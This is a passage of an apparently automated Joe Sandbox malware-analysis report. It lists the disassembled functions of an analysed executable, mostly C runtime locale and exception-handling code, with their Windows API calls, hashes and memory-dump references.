                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastThread
                                                                                • String ID:
                                                                                • API String ID: 1611280651-0
                                                                                • Opcode ID: 38afd01a4fb646d3c031b96f09f76d0dfca65c130d579bd85b779fecdce66aa1
                                                                                • Instruction ID: dc2af859251f661d281a46ffc4283fc4276b5dc3cf32c80c70a695cc556816f0
                                                                                • Opcode Fuzzy Hash: 38afd01a4fb646d3c031b96f09f76d0dfca65c130d579bd85b779fecdce66aa1
                                                                                • Instruction Fuzzy Hash: 4FF0AFB1A40204AFDB00EFB0D94AEAE7B79FF05710F214549F0019B2A3CB7499418BA2
                                                                                Function 00AC11B2 Relevance: 3.0, APIs: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LCMapStringEx.KERNELBASE(?,00AC47E4,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00AC11E6
                                                                                • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00AC47E4,?,?,00000000,?,00000000), ref: 00AC1204
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID:
                                                                                • API String ID: 2568140703-0
                                                                                • Opcode ID: 3ee35b9164353d3a560b1a2f835a28d5bd12e6cf0795dcadf65f2ce5e69d80d7
                                                                                • Instruction ID: 0ac7fcec432e201f467755f2dbdff038a9fcbd6e375d70837b99c5e19ffbe78b
                                                                                • Opcode Fuzzy Hash: 3ee35b9164353d3a560b1a2f835a28d5bd12e6cf0795dcadf65f2ce5e69d80d7
                                                                                • Instruction Fuzzy Hash: FCF0CA3210011ABBCF12AF90ED04EDE3F66FF59361F068224FA2965121C736C832AB90
                                                                                Function 00AC6176 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(E8458D00,?,00AC63C5,00AC63B9,00000000), ref: 00AC61A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID:
                                                                                • API String ID: 1807457897-0
                                                                                • Opcode ID: af0eacf52eca84c492ae910ea95ae065dbc3b35036f70ffb11610c2128e39c1f
                                                                                • Instruction ID: d553f75bee01bec250985131c2a5e617cb7f82af5c09b1548ec4860df7e69a5c
                                                                                • Opcode Fuzzy Hash: af0eacf52eca84c492ae910ea95ae065dbc3b35036f70ffb11610c2128e39c1f
                                                                                • Instruction Fuzzy Hash: 825127719042589EDB21CB28CD84FE67BBCEB59304F2406EDE59AD7182C2749E46DF20
                                                                                Function 00AC0DA3 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1be0b05de43bd2680a9f3f5d087a3dacabb1faeba14ac796ddde41dc89934aa8
                                                                                • Instruction ID: 0962404c6d4c33238de5be9e581c79547072807667bc52ae4e2f6ca0ddfcdb5b
                                                                                • Opcode Fuzzy Hash: 1be0b05de43bd2680a9f3f5d087a3dacabb1faeba14ac796ddde41dc89934aa8
                                                                                • Instruction Fuzzy Hash: 0E012437780215EFEB12CFA9EC40F5A33AAFBD43203268528F901EB184EE30D8019790

                                                                                Non-executed Functions

                                                                                Function 00AC8E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00AC9177,00000002,00000000,?,?,?,00AC9177,?,00000000), ref: 00AC8EF2
                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,00AC9177,00000002,00000000,?,?,?,00AC9177,?,00000000), ref: 00AC8F1B
                                                                                • GetACP.KERNEL32(?,?,00AC9177,?,00000000), ref: 00AC8F30
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 2299586839-711371036
                                                                                • Opcode ID: 0d849e61d89a92c7d2b147e34d9937793b83536fcbd71c8cfd78bffe1166e672
                                                                                • Instruction ID: ea797749a1f92da5c7ddd8911b07709f1c82e44f6099749b82ffedfd91f74efb
                                                                                • Opcode Fuzzy Hash: 0d849e61d89a92c7d2b147e34d9937793b83536fcbd71c8cfd78bffe1166e672
                                                                                • Instruction Fuzzy Hash: E0217F72A00101AADB35CF58C904F9B76A7BF54F64B57842DE90AEB104EF3ADD41D390
                                                                                Function 00AC902E Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00AC913A
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00AC9183
                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00AC9192
                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00AC91DA
                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00AC91F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                • String ID:
                                                                                • API String ID: 415426439-0
                                                                                • Opcode ID: 93f05591ae64dfe5a504e2c8de11f5845d79fd9092f88c12424f48dc75995fa2
                                                                                • Instruction ID: ce1797bfcd899e7d5ed22c708a755ecd028fe4d07c4b05f289c3feafa8971357
                                                                                • Opcode Fuzzy Hash: 93f05591ae64dfe5a504e2c8de11f5845d79fd9092f88c12424f48dc75995fa2
                                                                                • Instruction Fuzzy Hash: F5515E71A00206ABEF50DFA5CD4AFBF77B8BF08700F0A456DA915E7191EB7099448B61
                                                                                Function 00AC86CA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,00ABECBF,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00AC878B
                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00ABECBF,?,?,?,00000055,?,-00000050,?,?), ref: 00AC87B6
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00AC8919
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                • String ID: utf8
                                                                                • API String ID: 607553120-905460609
                                                                                • Opcode ID: 0fc0d774e33a0df1a2b60011cae7139c4146531670b28dda48da41644b3c7ffa
                                                                                • Instruction ID: c27717fe4ec95b9219162d05e57095cae97c5fe733eeec768b06860a93695d7f
                                                                                • Opcode Fuzzy Hash: 0fc0d774e33a0df1a2b60011cae7139c4146531670b28dda48da41644b3c7ffa
                                                                                • Instruction Fuzzy Hash: DE71F535A00206AAEB24AB75CD86FBA73A8FF45740F16442DF905DB181FF78E94187A0
                                                                                Function 00AB6549 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00AB6555
                                                                                • IsDebuggerPresent.KERNEL32 ref: 00AB6621
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AB663A
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00AB6644
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                • String ID:
                                                                                • API String ID: 254469556-0
                                                                                • Opcode ID: 6318811cee571e17d9fd7e33d9f63a576aa7953e301d4514b162e360dc44085b
                                                                                • Instruction ID: a563e94a6bad76bc4c16b42f48cdfa41d5cabca7a307f9ce3dd749476a0925eb
                                                                                • Opcode Fuzzy Hash: 6318811cee571e17d9fd7e33d9f63a576aa7953e301d4514b162e360dc44085b
                                                                                • Instruction Fuzzy Hash: AB31F975D052189BDF20DFA4D949BCDBBB8BF08304F1041AAE40CAB251EB749A85CF45
                                                                                Function 00AC8ADD Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC8B31
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC8B7B
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC8C41
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 661929714-0
                                                                                • Opcode ID: 4d7a7d9f8a75df04425a535adbfcc7d2d078937ab54ee614d65bf49d01a34b22
                                                                                • Instruction ID: c74b932c75c7aa51bb2b21a980838ceb4d30333377c02cce2342dc265404aa90
                                                                                • Opcode Fuzzy Hash: 4d7a7d9f8a75df04425a535adbfcc7d2d078937ab54ee614d65bf49d01a34b22
                                                                                • Instruction Fuzzy Hash: DE618D719002179FEB299F28CD82FAA77A9FF14300F1241BDE906C6185EB3CD981CB60
                                                                                Function 00ABA293 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00ABA38B
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00ABA395
                                                                                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00ABA3A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 73e59bc9ed215675f0fa69266ac1b9e9b9cda98022292e5a729302855abe6bbe
                                                                                • Instruction ID: e51350c9f8e753eb031588917bd94f43edfa089f9bf13208dbf35ffdd5c55dc8
                                                                                • Opcode Fuzzy Hash: 73e59bc9ed215675f0fa69266ac1b9e9b9cda98022292e5a729302855abe6bbe
                                                                                • Instruction Fuzzy Hash: 7931B3759012189BCB21DF64DD89BCCBBB8BF18310F5041EAE41CA7261EB749F858F55
                                                                                Function 00AC4D2F Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,00AC4D2A,?,?,?,?,?,?,00000000), ref: 00AC4F5C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: f3215220a8a70031edc630999ddaf16295a4fd7db58b9c730f4c48d7442c8d94
                                                                                • Instruction ID: 4bba3418c1414eb1837285af1b8c227ca964dea6aa81e1d01632b957f4c654c0
                                                                                • Opcode Fuzzy Hash: f3215220a8a70031edc630999ddaf16295a4fd7db58b9c730f4c48d7442c8d94
                                                                                • Instruction Fuzzy Hash: A8B12631610608DFDB15CF28C496FA57BA0FF49365F2A865CE89ACF2A1C335E991CB44
                                                                                Function 00AB602C Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AB6042
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FeaturePresentProcessor
                                                                                • String ID:
                                                                                • API String ID: 2325560087-0
                                                                                • Opcode ID: bd7fbac3d503311af0665ccc804c305a3e225c01830856b3a9eb24b64017257b
                                                                                • Instruction ID: ab4a1e4ca40a8b12fea3dac2c7d04639cfb2a9e4120f6da8e2e16b3d8c1c4e63
                                                                                • Opcode Fuzzy Hash: bd7fbac3d503311af0665ccc804c305a3e225c01830856b3a9eb24b64017257b
                                                                                • Instruction Fuzzy Hash: 0B516EB1A103198FDB14CF59E981BAABBF8FB58314F14C52AD501EB2A2E7799900CF50
                                                                                Function 00AC5AC6 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 784659f6547996c3ab50688cf54613e83d5b42e2e542c9c7576a6aec87f3c777
                                                                                • Instruction ID: 1d3c7989f76ba4d97fafd2022df75a94a709e6afe1d589810e9575e750f9f87f
                                                                                • Opcode Fuzzy Hash: 784659f6547996c3ab50688cf54613e83d5b42e2e542c9c7576a6aec87f3c777
                                                                                • Instruction Fuzzy Hash: C741A275C04619AEDB10DF79CC89EAABBB8EB45300F1542DDF449D3201EA31AE848F10
                                                                                Function 00AC8D30 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC8D84
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 3736152602-0
                                                                                • Opcode ID: 65a504d36fa8c8b6b5a120bcc9d500e1edef4bd58bafca6a58acf93aa2ed85ed
                                                                                • Instruction ID: e647b803b4ae0205d973e267f617e622abd2d500114e2d42635b0cb3929f05f4
                                                                                • Opcode Fuzzy Hash: 65a504d36fa8c8b6b5a120bcc9d500e1edef4bd58bafca6a58acf93aa2ed85ed
                                                                                • Instruction Fuzzy Hash: 62217F32A11206ABDB29AB24DD41FBA73A9FF65311F12407EF906D6181EF78E9418B50
                                                                                Function 00AC89B7 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • EnumSystemLocalesW.KERNEL32(00AC8ADD,00000001,00000000,?,-00000050,?,00AC910E,00000000,?,?,?,00000055,?), ref: 00AC8A29
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                • String ID:
                                                                                • API String ID: 2417226690-0
                                                                                • Opcode ID: cb9605de1a596a1a8b90e099ebbe1b920525593aa9c8e130ae53f2ae956bfdc2
                                                                                • Instruction ID: dd8f1072837c5af5688e069c390df90667db2a7e692b83ab09ca0b174053f047
                                                                                • Opcode Fuzzy Hash: cb9605de1a596a1a8b90e099ebbe1b920525593aa9c8e130ae53f2ae956bfdc2
                                                                                • Instruction Fuzzy Hash: 8A110C372007059FDB18DF39C891A7AB791FF84359B16442EE94687B40D775B943C740
                                                                                Function 00AC8F5F Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00AC8CF9,00000000,00000000,?), ref: 00AC8F8B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
